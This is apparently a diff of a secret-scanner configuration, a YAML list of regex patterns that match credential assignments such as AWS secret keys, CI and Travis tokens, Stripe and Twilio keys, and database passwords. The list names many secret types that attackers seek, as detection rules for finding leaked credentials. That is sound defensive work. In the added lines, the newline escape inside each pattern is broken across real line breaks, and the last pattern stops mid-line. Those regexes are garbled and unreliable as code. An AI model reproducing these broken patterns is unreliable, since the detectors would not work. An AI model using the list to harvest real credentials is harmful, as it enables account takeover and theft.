"(?i)[\"']?claimr[_-]?superuser[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?claimr[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?claimr[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?user[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?server[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?registry[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?project[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?chrome[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?chrome[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cheverny[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cf[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?certificate[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?censys[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cattle[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cattle[_-]?agent[_-]?instance[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cattle[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cargo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cache[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bx[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bx[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bundlesize[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?built[_-]?branch[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?browserstack[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?browser[_-]?stack[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?brackets[_-]?repo[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?pass[_-]?prod[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintraykey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?gpg[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?b2[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?b2[_-]?app[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?awssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?awscn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?awscn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?awsaccesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?ses[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?ses[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?config[_-]?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?config[_-]?accesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?access[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?author[_-]?npm[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?author[_-]?email[_-]?addr[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?auth0[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?auth0[_-]?api[_-]?clientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?assistant[_-]?iam[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifactory[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?argos[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?apple[_-]?id[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?appclientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?app[_-]?secrete[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?app[_-]?report[_-]?token[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?app[_-]?bucket[_-]?perm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?apigw[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?apiary[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?api[_-]?key[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?api[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aos[_-]?sec[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aos[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ansible[_-]?vault[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?android[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?anaconda[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?amazon[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?amazon[_-]?bucket[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?alicloud[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?alicloud[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?alias[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?search[_-]?key[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?search[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?search[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?search[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?mcm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?mcm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?server[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?partner[_-]?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?partner[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?account[_-]?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?account[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yangshun[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yangshun[_-]?gh[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?www[_-]?googleapis[_-]?com[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?ssh[_-]?connect[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?report[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?prepare[_-]?dir[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?db[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?db[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wporg[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wordpress[_-]?db[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wordpress[_-]?db[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wincert[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?test[_-]?server[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?3[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?2[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?fb[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?5[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?4[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?3[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?2[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?watson[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?watson[_-]?device[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?watson[_-]?conversation[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wakatime[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?vscetoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?visual[_-]?recognition[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?virustotal[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?v[_-]?sfdc[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?v[_-]?sfdc[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?usertravis[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?user[_-]?assets[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?user[_-]?assets[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?use[_-]?ssh[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?urban[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?urban[_-]?master[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?urban[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?unity[_-]?serial[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?unity[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twitteroauthaccesstoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twitteroauthaccesssecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twitter[_-]?consumer[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twitter[_-]?consumer[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twine[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?configuration[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?chat[_-]?account[_-]?api[_-]?service[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?api[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?trex[_-]?okta[_-]?client[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?trex[_-]?client[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?secure[_-]?env[_-]?vars[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?pull[_-]?request[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?e2e[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?com[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?branch[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?token[_-]?core[_-]?java[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?thera[_-]?oss[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?tester[_-]?keys[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?test[_-]?test[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?test[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?tesco[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?svn[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?surge[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?surge[_-]?login[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?stripe[_-]?public[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?stripe[_-]?private[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?strip[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?strip[_-]?publishable[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?starship[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?starship[_-]?account[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?star[_-]?test[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?star[_-]?test[_-]?location[\"']?[^\\S\r + + ]*[=:][^\\S\r + 